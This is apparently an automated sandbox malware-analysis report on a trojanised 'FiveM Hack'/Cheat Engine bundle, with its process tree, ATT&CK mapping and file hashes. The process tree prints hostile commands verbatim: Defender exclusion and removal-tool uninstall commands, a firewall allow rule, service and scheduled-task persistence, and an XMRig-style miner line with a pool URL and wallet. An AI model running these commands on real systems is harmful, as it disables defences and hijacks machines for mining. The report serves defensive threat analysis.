35edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	CheatEngine75.tmp

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2880	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2944	build.exe
2460	powershell.exe
2944	build.exe
2944	build.exe
2944	build.exe
2944	build.exe
2944	build.exe
2224	dlpwxhhxvcgc.exe
592	powershell.exe
2224	dlpwxhhxvcgc.exe
2224	dlpwxhhxvcgc.exe
2224	dlpwxhhxvcgc.exe
1728	powershell.exe
1872	conhost.exe
2864	powershell.exe
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2776	conhost.exe
2776	conhost.exe
2960	powershell.exe
3068	powershell.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe
2632	svchost.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

description	pid	Process
Token: SeDebugPrivilege	2724	Windows Defender.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: SeDebugPrivilege	592	powershell.exe
Token: SeLockMemoryPrivilege	752	svchost.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: SeDebugPrivilege	1872	conhost.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: SeDebugPrivilege	2776	conhost.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeLockMemoryPrivilege	2632	svchost.exe
Token: SeLockMemoryPrivilege	2632	svchost.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe
Token: 33	2724	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2724	Windows Defender.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2020	CheatEngine75.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2084 wrote to memory of 2972	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	30
PID 2084 wrote to memory of 2972	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	30
PID 2084 wrote to memory of 2972	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	30
PID 2084 wrote to memory of 2972	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	30
PID 2972 wrote to memory of 2724	2972	Server.exe	31
PID 2972 wrote to memory of 2724	2972	Server.exe	31
PID 2972 wrote to memory of 2724	2972	Server.exe	31
PID 2972 wrote to memory of 2724	2972	Server.exe	31
PID 2084 wrote to memory of 2944	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	32
PID 2084 wrote to memory of 2944	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	32
PID 2084 wrote to memory of 2944	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	32
PID 2084 wrote to memory of 2944	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	32
PID 2724 wrote to memory of 2760	2724	Windows Defender.exe	33
PID 2724 wrote to memory of 2760	2724	Windows Defender.exe	33
PID 2724 wrote to memory of 2760	2724	Windows Defender.exe	33
PID 2724 wrote to memory of 2760	2724	Windows Defender.exe	33
PID 2908 wrote to memory of 2964	2908	cmd.exe	44
PID 2908 wrote to memory of 2964	2908	cmd.exe	44
PID 2908 wrote to memory of 2964	2908	cmd.exe	44
PID 2084 wrote to memory of 1028	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	48
PID 2084 wrote to memory of 1028	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	48
PID 2084 wrote to memory of 1028	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	48
PID 2084 wrote to memory of 1028	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	48
PID 2224 wrote to memory of 1812	2224	dlpwxhhxvcgc.exe	55
PID 2224 wrote to memory of 1812	2224	dlpwxhhxvcgc.exe	55
PID 2224 wrote to memory of 1812	2224	dlpwxhhxvcgc.exe	55
PID 2224 wrote to memory of 1812	2224	dlpwxhhxvcgc.exe	55
PID 2224 wrote to memory of 1812	2224	dlpwxhhxvcgc.exe	55
PID 2224 wrote to memory of 1812	2224	dlpwxhhxvcgc.exe	55
PID 2224 wrote to memory of 1812	2224	dlpwxhhxvcgc.exe	55
PID 2224 wrote to memory of 1812	2224	dlpwxhhxvcgc.exe	55
PID 2224 wrote to memory of 1812	2224	dlpwxhhxvcgc.exe	55
PID 2224 wrote to memory of 752	2224	dlpwxhhxvcgc.exe	57
PID 2224 wrote to memory of 752	2224	dlpwxhhxvcgc.exe	57
PID 2224 wrote to memory of 752	2224	dlpwxhhxvcgc.exe	57
PID 2224 wrote to memory of 752	2224	dlpwxhhxvcgc.exe	57
PID 2224 wrote to memory of 752	2224	dlpwxhhxvcgc.exe	57
PID 984 wrote to memory of 3004	984	cmd.exe	58
PID 984 wrote to memory of 3004	984	cmd.exe	58
PID 984 wrote to memory of 3004	984	cmd.exe	58
PID 1028 wrote to memory of 1872	1028	FiveM.exe	59
PID 1028 wrote to memory of 1872	1028	FiveM.exe	59
PID 1028 wrote to memory of 1872	1028	FiveM.exe	59
PID 1028 wrote to memory of 1872	1028	FiveM.exe	59
PID 2084 wrote to memory of 1648	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	60
PID 2084 wrote to memory of 1648	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	60
PID 2084 wrote to memory of 1648	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	60
PID 2084 wrote to memory of 1648	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	60
PID 2084 wrote to memory of 2124	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	62
PID 2084 wrote to memory of 2124	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	62
PID 2084 wrote to memory of 2124	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	62
PID 2084 wrote to memory of 2124	2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	62
PID 1872 wrote to memory of 1588	1872	conhost.exe	63
PID 1872 wrote to memory of 1588	1872	conhost.exe	63
PID 1872 wrote to memory of 1588	1872	conhost.exe	63
PID 1588 wrote to memory of 1728	1588	cmd.exe	65
PID 1588 wrote to memory of 1728	1588	cmd.exe	65
PID 1588 wrote to memory of 1728	1588	cmd.exe	65
PID 2124 wrote to memory of 2988	2124	FiveM Hack.exe	66
PID 2124 wrote to memory of 2988	2124	FiveM Hack.exe	66
PID 2124 wrote to memory of 2988	2124	FiveM Hack.exe	66
PID 1872 wrote to memory of 2896	1872	conhost.exe	67
PID 1872 wrote to memory of 2896	1872	conhost.exe	67
PID 1872 wrote to memory of 2896	1872	conhost.exe	67

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
"C:\Users\Admin\AppData\Local\Temp\461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Server.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Users\Admin\AppData\Roaming\Windows Defender.exe
    "C:\Users\Admin\AppData\Roaming\Windows Defender.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Windows Defender.exe" "Windows Defender.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:2760
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\build.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\build.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2944
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:2964
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "PVYZKASM"
    3⤵
    - Launches sc.exe
    PID:2816
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "PVYZKASM" binpath= "C:\ProgramData\kmmnqxgtotnx\dlpwxhhxvcgc.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1548
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1952
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "PVYZKASM"
    3⤵
    - Launches sc.exe
    PID:2228
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1028
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1872
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1588
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1728
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      4⤵
      PID:2896
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2880
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      4⤵
      Loads dropped DLL
      PID:2528
    - - C:\Users\Admin\AppData\Local\Temp\services64.exe
        
        C:\Users\Admin\AppData\Local\Temp\services64.exe
        5⤵
        Executes dropped EXE
        
        PID:480
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        6⤵
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2776
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        7⤵
        
        PID:1964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3068
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        7⤵
        Executes dropped EXE
        
        PID:1552
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        8⤵
        
        PID:1156
        
        C:\Windows\System32\svchost.exe
        
        C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=44tR22o4E8HYHFrMJeXruQYqEwLuXTGwiGHa2P5S6CPReNh6TC1z3p3HSC97upDwboECfSVrPD2LzGYortC66JuTFuvjMGb --pass=x --cpu-max-threads-hint=70 --cinit-kill-targets="" --tls --cinit-kill
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2632
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Rename_Z60IHLDjO6.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Rename_Z60IHLDjO6.exe"
  2⤵
  - Executes dropped EXE
  PID:1648
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2988
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatEngine75.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatEngine75.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1868
- - C:\Users\Admin\AppData\Local\Temp\is-G4GD1.tmp\CheatEngine75.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-G4GD1.tmp\CheatEngine75.tmp" /SL5="$C01FE,2335682,780800,C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatEngine75.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks for any installed AV software in registry
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    PID:2020

C:\ProgramData\kmmnqxgtotnx\dlpwxhhxvcgc.exe
C:\ProgramData\kmmnqxgtotnx\dlpwxhhxvcgc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2224
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:984
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:3004
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1812
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c6bb964f094902b5fc24c1f307e72bc7

SHA1
974bc5730b0131798b776ac24668be9967e794eb

SHA256
e106bae77455932e85408f42ad23f7df6984675a582111c9def63226bd518c31

SHA512
56a92ef0c8e3c6a4f503f6e8773e93bc2edbd7f0c631e6465ee3b7451dc34de90076c3a1c3160d7d612cb54cae7a7c177272bf1c1559d6fa479a60d8925dba0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab93F8.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe

Filesize
29.8MB

MD5
00ce1e4793d5a4876cbb00df76e58e8c

SHA1
872387a2e9125ffe3e173fbae32280b423c5c128

SHA256
36e8a050ec80df43c8fec1cea5cde9fbb09f432ec58848399dd666a992948679

SHA512
df73de1b15f1b291af87387decc436139b52e262ef7b3500124d9e920fb1af4b99632320e0b48211b9b2151b1fcb3f4aff61ac7c2dbd6de92699dfcd11444e47

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Rename_Z60IHLDjO6.exe

Filesize
37.2MB

MD5
62b8cb69f7c3ce2c5a843a8fa66b580f

SHA1
5f0440dface4bb25bbe3ee0a7dc7223b36eca37a

SHA256
8c586ec7de39427fa8fc2480c10eb2e04728793e2033e3103ed140f1b4cfb535

SHA512
ffc19d8d3f5cd6be99065203e5fc59ad993122c9bab91c243f62390e2aff6b710a63fe0c84776822fcd5ab195eb6cfa94ed7275d0ba336d50fa32afb26141e9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\build.exe

Filesize
2.5MB

MD5
ad60579bf765225e548e30a8068d03b9

SHA1
87abbf7819cd3e354a24aaeec6e1e2d77b01a72e

SHA256
9c40ef00c2bae13077c19a89a712ed3ba1786096b7360b04a6ca004bf9fc6434

SHA512
e4a26dc6d00e8117060002475861bf8224deeec6f74bedfd9070c8d5bad21cc83ae8bd8230a0a2d2d2267c1ecffa2b532f87792f9d2c3cd1ee3c55ace15d7146

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar941A.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21242\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21242\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
517eb9e2cb671ae49f99173d7f7ce43f

SHA1
4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

SHA256
57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

SHA512
492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21242\python311.dll

Filesize
1.6MB

MD5
bb46b85029b543b70276ad8e4c238799

SHA1
123bdcd9eebcac1ec0fd2764a37e5e5476bb0c1c

SHA256
72c24e1db1ba4df791720a93ca9502d77c3738eebf8b9092a5d82aa8d80121d0

SHA512
5e993617509c1cf434938d6a467eb0494e04580ad242535a04937f7c174d429da70a6e71792fc3de69e103ffc5d9de51d29001a4df528cfffefdaa2cef4eaf31

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21242\ucrtbase.dll

Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-U3M5U.tmp\AVAST.png

Filesize
48KB

MD5
378f74a0cbdd582d8b434b7b978ff375

SHA1
56817b18feeace3481a427a6ad8bf4e09b6663e4

SHA256
1225afda135b0bf3b5633595af4096f8c6620ebb34aa5df7c64253f03668b33d

SHA512
1d1c5394bb8fce88a26827af821abb187e9a9f09082310038bc66b7e4c133f27d101dd8c0f3291231efcf68876380d6c62b1653832d7732de2fea65a6ae2c88f

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-U3M5U.tmp\AVG_BRW.png

Filesize
29KB

MD5
0b4fa89d69051df475b75ca654752ef6

SHA1
81bf857a2af9e3c3e4632cbb88cd71e40a831a73

SHA256
60a9085cea2e072d4b65748cc71f616d3137c1f0b7eed4f77e1b6c9e3aa78b7e

SHA512
8106a4974f3453a1e894fec8939038a9692fd87096f716e5aa5895aa14ee1c187a9a9760c0d4aec7c1e0cc7614b4a2dbf9b6c297cc0f7a38ba47837bede3b296

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-U3M5U.tmp\CCleaner.png

Filesize
193KB

MD5
7c87614f099c75a0bed6ab01555143dd

SHA1
07ab72dc4a1e53e2c62ecccc1221472854d78635

SHA256
02335420cb5c2fa33eec48f32706d2353f8b609daaf337458f04a8f98d999a7c

SHA512
29b7ce896332ed2a05235645adb963b77920a0a252561684ea9f1f925f69dbcee4685e1b30584c1034a15b7efc18b911902d1ecb41c523cf2552ff23e165bf43

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-U3M5U.tmp\logo.png

Filesize
258KB

MD5
6b7cb2a5a8b301c788c3792802696fe8

SHA1
da93950273b0c256dab64bb3bb755ac7c14f17f3

SHA256
3eed2e41bc6ca0ae9a5d5ee6d57ca727e5cba6ac8e8c5234ac661f9080cedadf

SHA512
